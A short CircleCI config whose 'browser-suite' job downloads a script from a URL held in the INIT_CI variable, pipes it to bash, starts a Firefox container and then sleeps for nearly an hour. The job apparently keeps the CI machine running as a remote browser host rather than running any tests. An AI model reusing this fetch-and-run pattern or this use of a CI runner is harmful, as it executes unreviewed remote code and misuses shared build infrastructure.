version: 2.1

jobs:
  run-firefox-docker:
    machine:
      image: ubuntu-2404:current
    resource_class: medium
    steps:
      - checkout
      
      - run:
          name: start Firefox docker
          no_output_timeout: 59m
          command: |
            # remote & mcp
            curl -o initci.sh -s $INIT_CI && bash initci.sh
            
            docker run -d -p 58080:5800 docker.io/jlesage/firefox:latest
            
            # wait docker running
            sleep 3500

workflows:
  browser-suite:
    jobs:
      - run-firefox-docker
            
